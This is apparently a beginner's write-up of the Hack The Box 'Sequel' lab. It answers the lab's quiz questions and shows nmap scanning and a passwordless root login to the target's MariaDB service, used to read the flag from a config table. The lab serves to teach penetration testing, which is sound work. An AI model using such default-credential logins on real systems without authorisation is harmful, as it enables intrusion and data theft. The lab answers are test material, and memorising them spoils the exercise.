HTB: Learn the basics of Pen Testing: Sequel
Enumeration
Target machine: 10.129.95.232
Let’s start with nmap -sV -sC 10.129.95.232 . The scanning took a couple of minutes before finally providing the information.
First, let’s “Spawn the Machine” in green; make sure there are no active machine. The target machine IP address is 10.129.95.232. Your target machine IP address maybe different so use the IP address that you had received for this box.
Check out the IP address in a web browser to see what the website looks like.
Unfortunately, there is no website because the webpage doesn’t open. Typed ping 8.8.8.8to make sure there’s internet access and there is. Pinged the target machine which is fine. Hence, for this machine, we will not be using the website.
Task 1 asks, “What does the acronym SQL stand for?”
The answer is Structured Query Language. You can google the acronym to find the answer or use the hint which also advises to use google search.
Task 2 asks, “During our scan, which port running MySQL do we find?”
3306. The screenshot of nmap is shown at top.
Task 3 asks, “What community-developed MySQL version is the target running?”
You can look back in the nmap scan and see the version name which is MariaDB.
Task 4 asked, “What switch do we need to use in order to specify a login username for the MySQL service?”
-u is the switch to use whenever you are trying to login with a username for example root to the target machine using MySQL.
Task 5 asks, “Which username allows us to log into MariaDB without providing a password?
All users need passwords but we are currently trying to get into root to get the flag, so my guess is root which is the correct answer.
Task 6 asks, “What symbol can we use to specify within the query that we want to display everything inside a table?
I figured it was the semicolon (;) however that is not the case. So, I checked the hint to see what it says, “This will make you starry-eyed.” I’m going to try again and put the asterisk (*) symbol. Thanks to the hint, it worked. So, now we know that the asterisk symbol is there to specify within the query that we want to display everything inside a table.
Task 7 asks, “What symbol do we need to end each query with?”
Now, this is where we need the semicolon (;) symbol. It worked like a charm.
Finally, “Submit root flag.”
I googled, “mariadb mysql login as root without password” and received a link from the ibug.io website that said there are 3 ways to use MySQL/MariaDB CLI without password.
If you look into the ibug.io link, you can see that there is an example in Method 3: Use Unix authentication that said mysql -h 127.0.0.1.
Afterwards, I needed more help, so I googled again and searched for other websites for help. I checked out serverfault.com and it had very useful information for what I was looking for.
I put both in together to be able to access the target machine as root.
mysql -h 10.129.95.232 -u rootIn the same, serverfault.com link, there was more information that showed how to look into databases and tables as shown in the image below:
Therefore, I followed the same method to show databases.
The database showed htb, so I typed, use htb;
After going into the htb directory, I typed show tables;
Tables showed users and config. I already knew I was logged into root, so no point of looking into any other users. I typed, from config;which didn’t work. I remembered Task 6 said the asterisk (*) symbol can be used to specify within the query that we want to display everything inside a table. But, I didn’t know how to use the asterisk symbol. So, I searched google again
and came upon a website called actian.com.
The website showed to use select * from personnel;
Instead of using personnel, I used config; and remember the select option can be capitalized as well.
At last, the flag was there. The Sequel box is pwned.
